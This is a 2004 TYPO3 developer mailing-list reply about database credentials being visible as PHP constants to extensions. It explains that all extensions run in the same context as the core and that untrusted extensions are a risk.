[Typo3-dev] defined vars
Ernesto Baschny
ernst at baschny.de
Wed Oct 20 15:25:54 CEST 2004
On Wed, 20 Oct 2004, Daniel Gercke wrote:
> during writing my own extension i have called get_defined_constants().
> And i couldn´t believe what i saw:
>
> TYPO3_db real_db_name
> TYPO3_db_username real_username
> TYPO3_db_password real_password
> TYPO3_db_host real_host
>
> I think this is a security hole (typo3 v. 3.6.2).
> If i think about it, i could write an extension which is used by many
> people, and it can mail me some database accounts.
If you install an extension locally it can do much worse than that. Having
the password as a constant, a global variable, or just hidden in some
typo3-file don't make a difference, because all extensions run in the same
context as the typo3 core.
So what do you suggest to minimize the problem? Typo3 needs to connect to
the database, and it needs to be protected by a password. Typo3 needs to
be able to do this without user intervention.
This "problem" appear on every other PHP/Java/etc Web application that
accesses a database.
Just don't trust any extention you load from the Internet, except it is
"certified" somehow. :)
Cheers,
Ernesto
More information about the TYPO3-dev
mailing list